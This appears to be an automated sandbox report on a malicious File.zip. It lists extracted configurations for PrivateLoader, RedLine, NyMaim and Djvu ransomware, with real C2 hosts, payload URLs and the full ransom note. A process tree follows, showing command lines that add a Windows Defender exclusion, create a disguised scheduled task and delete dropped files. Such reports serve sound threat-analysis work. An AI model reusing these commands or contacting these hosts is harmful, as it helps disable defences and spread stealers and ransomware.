Resubmissions
16-09-2022 06:07
220916-gvaj4saeen 1016-09-2022 06:06
220916-gtp86segh5 116-09-2022 05:24
220916-f36rvaaeal 1015-09-2022 08:38
220915-kj2e8scdh7 10Analysis
-
max time kernel
301s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
16-09-2022 05:24
General
-
Target
https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Score
10/10
Malware Config
Extracted
Family
privateloader
C2
http://163.123.143.4/proxies.txt
http://107.182.129.251/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
163.123.143.12
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
Attributes
-
payload_url
https://vipsofts.xyz/files/mega.bmp
Extracted
Family
redline
Botnet
nam6.2
C2
103.89.90.61:34589
Attributes
-
auth_value
4040fe7c77de89cf1a6f4cebd515c54c
Extracted
Family
redline
Botnet
crtest
C2
denestyenol.xyz:81
Attributes
-
auth_value
ac9c5d38bbc1b733c499deeab5940e0d
Extracted
Family
redline
Botnet
Lyla3.12.09
C2
185.215.113.216:21921
Attributes
-
auth_value
893298c4bebea403e4a59dd151c4fcc2
Extracted
Family
nymaim
C2
208.67.104.97
85.31.46.167
Extracted
Family
djvu
C2
http://acacaca.org/test3/get.php
Attributes
-
extension
.eemv
-
offline_id
5IVlpkccZlJz0AZ5atgGWVKe9CGAnXjohDf40mt1
-
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-0e5rCKsYCc Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0560Jhyjd
rsa_pubkey.plain
Extracted
Family
redline
Botnet
3108_RUZKI
C2
213.219.247.199:9452
Attributes
-
auth_value
f71fed1cd094e4e1eb7ad1c53e542bca
Signatures
-
DcRat 18 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected Djvu ransomware 5 IoCs
-
Detects Smokeloader packer 1 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
-
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 18 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 30 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 15 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 19 IoCs
-
Drops file in Program Files directory 18 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 7 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 40 IoCs
-
Suspicious use of SendNotifyMessage 31 IoCs
-
Suspicious use of SetWindowsHookEx 52 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c start microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=01⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=02⤵
- DcRat
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffcc58746f8,0x7ffcc5874708,0x7ffcc58747183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4368 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6108 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7dc445460,0x7ff7dc445470,0x7ff7dc4454804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5756 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3252 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" ȸo/c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /U /s .\eTcHXU.OjD3⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5764 -s 4763⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Windows\Temp\xsv.exe6⤵
-
C:\Windows\Temp\xsv.exeC:\Windows\Temp\xsv.exe7⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\368C0412AGB029I.exehttps://iplogger.org/1DLDa74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE3D3.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSFC4D.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
